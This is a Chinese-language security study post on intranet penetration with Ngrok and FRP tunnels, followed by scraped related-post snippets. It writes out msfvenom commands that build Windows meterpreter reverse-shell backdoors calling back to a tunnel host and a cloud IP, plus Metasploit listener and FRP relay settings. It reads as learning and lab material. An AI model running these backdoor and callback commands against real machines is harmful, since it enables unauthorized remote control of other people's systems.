内网安全-域横向内网漫游 Socks 代理隧道技术

1.前置知识:

1)正向与反向连接:

正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我们的服务器公网ip。

2)内网穿透代理、隧道技术:

隧道是为了解决流量分析/检测工具/防火墙等工具的过滤问题,而代理是为了解决网络连通性问题。

2.内网穿透Ngrok工具开通隧道—两个内网通讯上线:

首先去ngrok上买个免费的服务隧道,自行修改ip与端口,之后会映射到此ip与端口:

然后打开客户端,输入id,登录上分配给的免费服务器,启用成功。到这一步我们就已经可以实现内网连接通信了,那个地址直接就会映射到我们设置的ip与端口上。如果本机内网搭建的web服务,那么其他主机只要输入url就可以访问我们的网站了,前提端口得设置好。

我们通过手机流量就可以访问到本机内网搭建的web服务了,而且也可以在界面实时看到请求和状态码,很有趣:

接下来学习如何进一步利用此服务器实现攻击:

首先将服务映射端口分给虚拟机kali的ip与端口,用kali作为攻击机:

linux上启动:

./sunny clientid (你的id)

然后msf生成后门文件test.exe,需要修改lhost为自己的值,因为通过此地址传输流量反馈给kali攻击机:

msfvenom -p windows/meterpreter/reverse_http lhost=muguang.free.idcfengye.com lport=80 -f exe -o test.exe

msf监听流量:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.105
set lport 4444
exploit

然后将后门放到其他任意内网内的主机运行,我们可以监控到触发:

原理就是那个服务器做转发,运行木马,先向服务器地址发送请求在转到我们的内网地址,发送给我们设置要映射到的ip及端口,实现kali与目标机的内网互通,进而实现攻击。

3.内网穿透Frp自建跳板测试-两个内网通讯上线:

自行搭建,方便修改,成本低,使用多样化。

1)服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini

2)控制端-下载-解压-修改-启动:

控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3)靶机运行 frp 即可。


先开启服务端,在客户端开启后就能看到连接成功:

此时也就实现了内网穿透,访问服务器的6000端口就会转发映射给我们的本机5555端口。

进一步制作监听后门利用:

记得msf监听端口:

成功执行,实现自己frp搭建跳板完成内网转发。

frp使用手册:https://gofrp.org/docs/examples/
frp下载:https://github.com/fatedier/frp

4.CFS 三层内网漫游安全测试演练–(某CTF线下 2019)

网络环境如此,三台三个flag,最后一个不联网;用到 内网结合 WEB 攻防题库,涉及 WEB 攻击,内网代理路由等技术。

思路:检测/添加路由、正反向连接、进程代理访问 以及漏扫、生成后门等

工具:SocksCap64、Proxifier、proxychains-ng、nps

具体操作流程可以参考:
https://www.yuque.com/glan/xiaodisec/snfb19#jjgz8
三层内网漫游

内网安全学习(六)—域横向-内网漫游: Socks 代理相关推荐

  1. 内网安全-域横向内网漫游Socks代理隧道技术

    因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...

  2. 【内网安全】域横向内网漫游Socks代理隧道技术

    代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp.ngrok和ew等,ew(earthwo ...

  3. 免费学python的网课-学习python的时候观看网课学习还是买书学习效率高?

    看书.学习网络课程,以及参加课堂培训,本来就没有冲突呀!为什么还有此问? 如果你想快速地学会编程,建议你: 1.首先买一两本经典的编程书先自己看,按照书籍描述自己敲代码. 尽量按照书本中的章节来构建自 ...

  4. 内网安全:Socks 代理 || 本地代理 技术.

    内网安全:Socks 代理 || 本地代理 技术. Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端.支持多种协议,包括http.ftp请求及其它类型的请求 ...

  5. 内网渗透测试 MSF搭建socks代理

    环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...

  6. 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试

    文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...

  7. p66 内网安全-域横向批量atschtasksimpacket

    数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...

  8. 内网安全学习(二)---横向渗透

    域横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术 ...

  9. 内网域横向PTHPTKPTT哈希票据传递

    内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...

最新文章

  1. linux的git命令,linux命令实战安装git、配置git、创建仓库、部署项目
  2. wxWidgets:键盘 wxWidgets 示例
  3. centos7 docker安装和使用_入门教程
  4. 快速傅里叶变换(FFT)——按时间抽取DIT的基
  5. Nagios添加主机监控失败-故障小结
  6. php-fpm配置文件,指定session保存目录
  7. 广州大学计算机技术复试c语言试题,广州大学C语言程序设计期末考试试卷含答案...
  8. 主键与主键索引的关系
  9. 如何入门单片机C语言
  10. python更改下载源地址
  11. Deepflow 初步架构
  12. 使用openGL,用Bresenham算法画椭圆
  13. 新手做独立站需要掌握哪些技能
  14. av_read_frame
  15. js 利用input实现复制
  16. 如何查看Tomcat是否安装配置成功
  17. Unity3d 周分享(13期 2019.3.23 )
  18. 端到端OCR-ABCNet论文笔记
  19. OSChina 周二乱弹 ——追妹子最管用的方式
  20. HotSpot 是啥?

热门文章

  1. python中如何放大字体
  2. 自定义控件其实很简单 五
  3. python3 tkinter 刷新标签图片
  4. rockchip中的vop
  5. 流程图软件测评:Visio和亿图图示
  6. 2007年银行业从业人员资格考试试题及参考答案
  7. 问:女孩学编程好就业吗?
  8. 洪水填充算法_洪水填充算法分析
  9. Burp Suite之Scaner模块(三)
  10. 通过Excel制作下拉框筛选出成绩